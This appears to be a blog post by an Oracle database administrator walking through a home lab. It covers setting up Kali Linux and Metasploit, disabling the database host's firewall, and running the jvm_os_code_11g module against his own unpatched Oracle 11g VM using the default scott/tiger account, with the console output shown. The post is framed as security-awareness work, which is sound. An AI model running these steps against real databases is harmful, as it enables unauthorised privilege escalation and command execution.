Five steps to have your own Metasploit and Oracle demo environment

Bingo! I’ve done it! I’ve got Metaspoit working against an Oracle database. And in this blogpost I’ll explain how you can do it too.

 

Step 0. Your soon to be powned Oracle database

Let’s assume you already have a virtual machine with an Oracle database for demoing purposes. I have an 11.2.0.1 database on a host on VirtualBox. Make sure you have a hostname, listener port number and instance name ready for later testing purposes.

 

Step 1. Install Kali Linux 2

This step is the easiest. Really. You can download a Prebuilt Kali Linux 2 installation on VirtualBox or VMWare. In this example I’ve used VirtualBox.

Unzip it, start it. Log in with user root, password toor. There you go. The virtual machine has Metaspoit Framework and many other hackertools installed. You can use these tools right away.

Notice that you don’t have to register for this version of Metasploit either.

(Tip: Kali Linux 2 locks your screen after a while and using your mouse doesn’t make it come up with a way to log in and unlock it. Hit the enter key though and it comes back to life.)

 

Step 2. Install an Oracle Instant Client, and Ruby OCI8.

When you use Metasploit to use an exploit against your Oracle database, you’ll get an error:

[-] Failed to load the OCI library: cannot load such file -- oci8
[-] Try 'gem install ruby-oci8'
[*] Auxiliary module execution completed

The helpful hint to do gem install ruby-oci8 won’t work. You need to have an Oracle client first. You’ll find complete instructions what to do next here:

https://github.com/rapid7/metasploit-framework/wiki/How-to-get-Oracle-Support-working-with-Kali-Linux

 

Step 3. Configure the network of your VirtualBox-es.

From your Kali Linux 2 install you might find (actually it’s rather likely) that you can’t even ping to you VM with your Oracle database. I’ve learned how to solve that. There are a couple of things you have to look at:

  • Make sure you are in the same IP range / subnet and make sure that’s in the range of your virtual network.
  • Make sure your network settings of your VMs are set as Bridged.
  • After setting your network connections correctly, try to ping from your Kali Linux 2 setup to your Oracle db host.

 

Step 4. Turn off the firewall of the database server

Yes, my Linux host wasn’t exactly a push over. I had to disable the firewall to do the Metasploit trick.

service iptables status
service iptables stop
chkconfig iptables off

 

Step 5. Create a tnsnames.ora (really?)

Yes, I was totally surprised about this one. Why not just use a JDBC thin driver? But if you skip this step, you’ll get an ORA-12543: TNS:destination host unreachable error. If you’ve followed the instructions in the link of Step 2, you’ll have a TNS_ADMIN pointing to your Instant Client directory and you can put your tnsnames.ora there.

 

Start Metasploit and let’s play around!

All right, let’s see what we are capable of now. Let’s start Metasploit.

First have a look at the long list of possible exploits for Oracle software:

msf exploit(psexec) > search oracle
Matching Modules

================

Name                                       Disclosure Date  Rank       Description
----                                       ---------------  ----       -----------
auxiliary/admin/oracle/ora_ntlm_stealer    2009-04-07       normal     Oracle SMB Relay Code Execution
auxiliary/admin/oracle/oracle_login        2008-11-20       normal     Oracle Account Discovery
auxiliary/admin/oracle/oracle_sql          2007-12-07       normal     Oracle SQL Generic Query
auxiliary/admin/oracle/oraenum                              normal     Oracle Database Enumeration
auxiliary/admin/oracle/osb_execqr          2009-01-14       normal     Oracle Secure Backup exec_qr() Command Injection Vulnerability
[..]

Granted, there are a lot of exploits for very old Oracle database versions and Java exploits here. But there is at least one 11g R2 exploit that I can run against my unpatched database.

msf auxiliary(jvm_os_code_11g) > set RHOST 192.168.56.163
RHOST => 192.168.56.163
msf auxiliary(jvm_os_code_11g) > set SID KNUTSEL
SID => KNUTSEL

Metasploit tries to connect with uppercase SCOTT/TIGER. Apparently they never heard about case sensitive passwords. But Oracle will give a ORA-01017 error on that. So I’ve changed these in lowercase:

msf auxiliary(jvm_os_code_11g) > set dbuser scott
dbuser => scott
msf auxiliary(jvm_os_code_11g) > set dbpass tiger
dbpass => tiger

So these are the options we have now:

msf auxiliary(jvm_os_code_11g) > show options

Module options (auxiliary/sqli/oracle/jvm_os_code_11g):

Name    Current Setting                                    Required  Description
----    ---------------                                    --------  -----------
CMD     echo metasploit >> %SYSTEMDRIVE%\\unbreakable.txt  no        CMD to execute.
DBPASS  tiger                                              yes       The password to authenticate with.
DBUSER  scott                                              yes       The username to authenticate with.
RHOST   192.168.56.163                                     yes       The Oracle host.
RPORT   1521                                               yes       The TNS port.
SID     KNUTSEL                                            yes       The sid to authenticate with.

Let’s run the exploit:

msf auxiliary(jvm_os_code_11g) > run

[*] Attempting to grant JAVA IO Privileges
[*] Attempting to execute OS Code
[*] Auxiliary module execution completed

Did it work? Well, let’s see if scott got those Java permissions:

SQL> select grantee_name, type_name, name from USER_JAVA_POLICY where grantee_name='SCOTT';

GRANTEE_NAME               TYPE_NAME              NAME
------------------------------ ------------------------------ ------------------------------
SCOTT                   java.io.FilePermission          <<ALL FILES>>

Yep, that did the trick.

And with that it’s achievement unlocked: hacking an Oracle database with Metasploit. In a future blogpost I’ll try a couple of other exploits from Metasploit.

If you have any questions about using Metasploit against Oracle, please let me know.

Advertisements

About Marcel-Jan Krijgsman

Ever since I started working with Oracle, I had an interest in Oracle database performance tuning. This led, eventually, to a four day training I made and gave for customers of Transfer Solutions. Since 2012 I work for Rabobank Nederland. A few years ago I also became interested in Oracle database security. All technology aside, it is my experience that security usually plays out on a political level. I'm a Oracle certified professional for the 8i, 9i, 10g and 11g databases and Oracle Database 11g Performance Tuning Certified Expert.
This entry was posted in Hacking for better security awareness, Oracle security and tagged , , , , , , . Bookmark the permalink.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s